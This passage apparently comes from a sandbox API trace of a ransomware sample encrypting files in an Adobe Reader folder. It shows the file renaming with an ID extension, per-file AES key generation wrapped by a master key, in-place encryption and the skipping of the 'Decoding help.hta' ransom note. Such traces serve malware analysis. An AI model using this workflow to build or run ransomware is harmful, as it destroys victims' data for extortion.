lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0043.495] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0043.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" [0043.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta")) returned 0x1 [0043.495] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IrakHau.htm") returned -1 [0043.495] lstrlenW (lpString="IrakHau.htm") returned 11 [0043.495] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0043.495] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0043.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="IrakHau.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" [0043.495] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" [0043.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0043.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.504] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0043.504] CreateFileMappingA (hFile=0x38c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x234 [0043.504] CryptAcquireContextA (in: phProv=0xadcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xadcfcec*=0x3449028) returned 1 [0043.505] CryptGenKey (in: hProv=0x3449028, Algid=0x6610, dwFlags=0x1, phKey=0xadcfce8 | out: phKey=0xadcfce8*=0x5a5830) returned 1 [0043.505] CryptExportKey (in: hKey=0x5a5830, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xadcfbe4, pdwDataLen=0xadcfce4 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfce4*=0x2c) returned 1 [0043.505] MapViewOfFile (hFileMappingObject=0x234, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4280) returned 0x4410000 [0043.528] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x100) returned 1 [0043.528] CryptEncrypt (in: hKey=0x5a5830, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000, pdwDataLen=0xadcfce4*=0x4280, dwBufLen=0x4280 | out: pbData=0x4410000*, pdwDataLen=0xadcfce4*=0x4280) returned 1 [0043.529] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.530] CloseHandle (hObject=0x234) returned 1 [0043.530] CryptDestroyKey (hKey=0x5a5830) returned 1 [0043.530] CryptReleaseContext (hProv=0x3449028, dwFlags=0x0) returned 1 [0043.530] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.531] WriteFile (in: hFile=0x38c, lpBuffer=0xadcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xadcfbe4*, lpNumberOfBytesWritten=0xadcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.531] WriteFile (in: hFile=0x38c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xadcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.531] CloseHandle (hObject=0x38c) returned 1 [0043.532] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.533] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leame.htm", cAlternateFileName="")) returned 1 [0043.533] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0043.533] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0043.533] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" [0043.533] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta")) returned 0x1 [0043.533] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Leame.htm") returned -1 [0043.533] lstrlenW (lpString="Leame.htm") returned 9 [0043.533] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0043.533] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0043.533] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Leame.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" [0043.533] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" [0043.533] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0043.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x574 [0043.980] CreateFileMappingA (hFile=0x574, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6f0 [0043.980] CryptAcquireContextA (in: phProv=0xadcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xadcfcec*=0x3449e80) returned 1 [0045.964] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0xadcfce8 | out: phKey=0xadcfce8*=0x5db3b8) returned 1 [0045.964] CryptExportKey (in: hKey=0x5db3b8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xadcfbe4, pdwDataLen=0xadcfce4 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfce4*=0x2c) returned 1 [0045.964] MapViewOfFile (hFileMappingObject=0x6f0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4220) returned 0x2fe0000 [0046.075] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x100) returned 1 [0046.075] CryptEncrypt (in: hKey=0x5db3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fe0000, pdwDataLen=0xadcfce4*=0x4220, dwBufLen=0x4220 | out: pbData=0x2fe0000*, pdwDataLen=0xadcfce4*=0x4220) returned 1 [0046.076] UnmapViewOfFile (lpBaseAddress=0x2fe0000) returned 1 [0046.077] CloseHandle (hObject=0x6f0) returned 1 [0046.078] CryptDestroyKey (hKey=0x5db3b8) returned 1 [0046.078] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0046.078] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.078] WriteFile (in: hFile=0x574, lpBuffer=0xadcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xadcfbe4*, lpNumberOfBytesWritten=0xadcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.079] WriteFile (in: hFile=0x574, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xadcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.079] CloseHandle (hObject=0x574) returned 1 [0046.080] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.080] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeesMij.htm", cAlternateFileName="")) returned 1 [0046.080] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0046.080] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0046.080] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" [0046.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta")) returned 0x1 [0046.080] lstrcmpiW (lpString1="Decoding help.hta", lpString2="LeesMij.htm") returned -1 [0046.080] lstrlenW (lpString="LeesMij.htm") returned 11 [0046.080] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0046.080] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0046.080] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="LeesMij.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" [0046.080] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" [0046.080] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0046.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.170] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0046.170] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0046.170] CryptAcquireContextA (in: phProv=0xadcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xadcfcec*=0x34491c0) returned 1 [0046.171] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0xadcfce8 | out: phKey=0xadcfce8*=0x671cb0) returned 1 [0046.171] CryptExportKey (in: hKey=0x671cb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xadcfbe4, pdwDataLen=0xadcfce4 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfce4*=0x2c) returned 1 [0046.171] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41e0) returned 0x2fe0000 [0046.218] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x100) returned 1 [0046.218] CryptEncrypt (in: hKey=0x671cb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fe0000, pdwDataLen=0xadcfce4*=0x41e0, dwBufLen=0x41e0 | out: pbData=0x2fe0000*, pdwDataLen=0xadcfce4*=0x41e0) returned 1 [0046.219] UnmapViewOfFile (lpBaseAddress=0x2fe0000) returned 1 [0046.220] CloseHandle (hObject=0x3c4) returned 1 [0046.220] CryptDestroyKey (hKey=0x671cb0) returned 1 [0046.220] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0046.220] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.220] WriteFile (in: hFile=0x3c0, lpBuffer=0xadcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xadcfbe4*, lpNumberOfBytesWritten=0xadcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.221] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xadcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.221] CloseHandle (hObject=0x3c0) returned 1 [0046.222] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.225] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leggimi.htm", cAlternateFileName="")) returned 1 [0046.225] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0046.225] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0046.225] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" [0046.225] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\decoding help.hta")) returned 0x1 [0046.225] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Leggimi.htm") returned -1 [0046.225] lstrlenW (lpString="Leggimi.htm") returned 11 [0046.225] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0046.225] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0046.225] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpString2="Leggimi.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" [0046.225] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" [0046.225] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0046.225] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.226] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0046.226] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0046.226] CryptAcquireContextA (in: phProv=0xadcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xadcfcec*=0x34491c0) returned 1 [0046.227] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0xadcfce8 | out: phKey=0xadcfce8*=0x671c70) returned 1 [0046.227] CryptExportKey (in: hKey=0x671c70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xadcfbe4, pdwDataLen=0xadcfce4 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfce4*=0x2c) returned 1 [0046.227] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4280) returned 0x2fe0000 [0046.297] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xadcfbe4*, pdwDataLen=0xadcfcf8*=0x100) returned 1 [0046.297] CryptEncrypt (in: hKey=0x671c70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fe0000, pdwDataLen=0xadcfce4*=0x4280, dwBufLen=0x4280 | out: pbData=0x2fe0000*, pdwDataLen=0xadcfce4*=0x4280) returned 1 [0046.297] UnmapViewOfFile (lpBaseAddress=0x2fe0000) returned 1 [0046.299] CloseHandle (hObject=0x3c4) returned 1 [0046.299] CryptDestroyKey (hKey=0x671c70) returned 1 [0046.299] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0046.299] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.299] WriteFile (in: hFile=0x3c0, lpBuffer=0xadcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xadcfbe4*, lpNumberOfBytesWritten=0xadcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.300] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xadcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xadcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.300] CloseHandle (hObject=0x3c0) returned 1 [0046.302] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.302] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xadcfd30 | out: lpFindFileData=0xadcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeiaMe.htm", cAlternateFileName="")) returned 1 [0046.302] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*" [0046.302] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*") returned 48 [0046.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", 